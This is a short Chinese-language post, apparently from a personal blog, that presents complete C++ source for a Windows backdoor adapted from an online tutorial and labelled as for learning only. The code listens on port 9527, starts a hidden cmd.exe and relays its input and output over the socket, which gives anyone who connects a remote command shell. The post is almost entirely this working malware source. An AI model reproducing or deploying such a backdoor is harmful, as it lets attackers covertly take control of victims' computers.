一个单通道后门代码
平日无聊时从网络上看的一个教程中所写的后门代码。这仅仅只能作为一个学习所用。但是麻雀虽小,五脏俱全。
包含了套接字通信,通道,等知识。没有注释。这东西有需要的人才看。
A BackDoor reference the writer of syc
//////////////////////////////////////////////////////////////////////////////////
//a simple backdoor reference the tutotial from web
//thanks for the writer syc
//by chenqiangdage
//////////////////////////////////////////////////////////////////////////////////
#pragma once
#pragma comment(lib,"ws2_32.lib")
#include<windows.h>
#include<stdio.h>
#include<string.h>
bool bExit=false;
#define RECV_BUF_LEN 4096
char szCmdBuf[MAX_PATH]={0};
class ThreadNode{
public:
HANDLE hPipe;
SOCKET msocket;
ThreadNode()
{
hPipe=NULL;
msocket=INVALID_SOCKET;
}
};
bool SocketInit()
{
DWORD SocketVersion;
WSADATA WsaData;
SocketVersion=MAKEWORD(2,2);
if(!WSAStartup(SocketVersion,&WsaData)==NO_ERROR)
{
return false;
}
else
{
return true;
}
}
int SendData(SOCKET socket,void *pBuf,DWORD dwBuffLen)
{
if(socket==INVALID_SOCKET||!pBuf||dwBuffLen<=0)
return -1;
int iCurrentSend=0,offset=0;
do
{
iCurrentSend=send(socket,(char*)pBuf+offset,dwBuffLen,0);
if(iCurrentSend<=0)
break;
dwBuffLen-=iCurrentSend;
offset+=iCurrentSend;
}while(dwBuffLen>0);
return offset;
}
DWORD WINAPI ThreadInPutProc(LPVOID lpParam)
{
ThreadNode tnode=*(ThreadNode *)lpParam;
DWORD dwWrited=0,dwRecvd=0;
char szBuf[MAX_PATH]={0};
bool bRet=false;
while(true)
{
dwRecvd=recv(tnode.msocket ,szBuf,MAX_PATH,0);
if(dwRecvd>0&&dwRecvd!=SOCKET_ERROR)
{
WriteFile(tnode.hPipe ,szBuf,dwRecvd,&dwWrited,NULL);
}
else
{
closesocket(tnode.msocket );
WriteFile(tnode.hPipe ,"exit\r\t",sizeof("exit\r\t"),&dwWrited,NULL);
bExit=true;
break;
}
Sleep(50);
}
return true;
}
DWORD WINAPI ThreadOutPutProc(LPVOID lpParam)
{
ThreadNode tnode=*(ThreadNode *)lpParam;
char szBuf[RECV_BUF_LEN]={0};
DWORD dwReadLen,dwTotalAvail;
dwReadLen=dwTotalAvail=0;
bool bRet=false;
while(!bExit)
{
dwTotalAvail=0;
bRet=PeekNamedPipe(tnode.hPipe ,NULL,0,NULL,&dwTotalAvail,NULL);
if(bRet&&dwTotalAvail>0)
{
bRet=ReadFile(tnode.hPipe ,szBuf,RECV_BUF_LEN,&dwReadLen,NULL);
if(bRet&&dwReadLen>0)
{
SendData(tnode.msocket ,szBuf,dwReadLen);
}
Sleep(50);
}
}
return true;
}
bool StartShell(UINT uport)
{
if(!SocketInit())
return false;
SOCKET ListenSocket=socket(AF_INET,SOCK_STREAM,0);
sockaddr_in sServer;
sServer.sin_addr .S_un .S_addr =htonl(INADDR_ANY);
sServer.sin_family =AF_INET;
sServer.sin_port =htons(uport);
if(bind(ListenSocket,(sockaddr*)&sServer,sizeof(sServer))==SOCKET_ERROR)
{
return false;
}
if(listen(ListenSocket,5)==SOCKET_ERROR)
{
return false;
}
SOCKET AcceptSocket=accept(ListenSocket,NULL,0);
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
SECURITY_ATTRIBUTES sa;
sa.bInheritHandle =true;
sa.lpSecurityDescriptor =NULL;
sa.nLength =sizeof(SECURITY_ATTRIBUTES);
if(!CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0)||
!CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))
{
return false;
}
char mCmdLine[MAX_PATH]={0};
GetSystemDirectory(mCmdLine,MAX_PATH);
strcat(mCmdLine,"\\cmd.exe");
STARTUPINFO si;
PROCESS_INFORMATION pi;
si.cb =sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.dwFlags =STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow =SW_HIDE;
si.hStdInput =hReadPipe1;
si.hStdOutput =si.hStdError =hWritePipe2;
if(!CreateProcess(mCmdLine,NULL,NULL,NULL,true,NULL,NULL,NULL,&si,&pi))
{return false;}
HANDLE hThreadOutPut,hThreadInPut;
DWORD ThreadID;
ThreadNode mWriteNode,mReadNode;
mWriteNode.hPipe= hWritePipe1;
mReadNode.hPipe =hReadPipe2;
mReadNode.msocket =mWriteNode.msocket =AcceptSocket;
hThreadOutPut=CreateThread(NULL,0,ThreadOutPutProc,&mReadNode,true,&ThreadID);
hThreadInPut=CreateThread(NULL,0,ThreadInPutProc,&mWriteNode,true,&ThreadID);
HANDLE Handles[]={hThreadOutPut,hThreadInPut};
WaitForMultipleObjects(2,Handles,TRUE,INFINITE);
return true;
}
int main(int argv,char *garc[])
{
StartShell(9527);
return 0;
}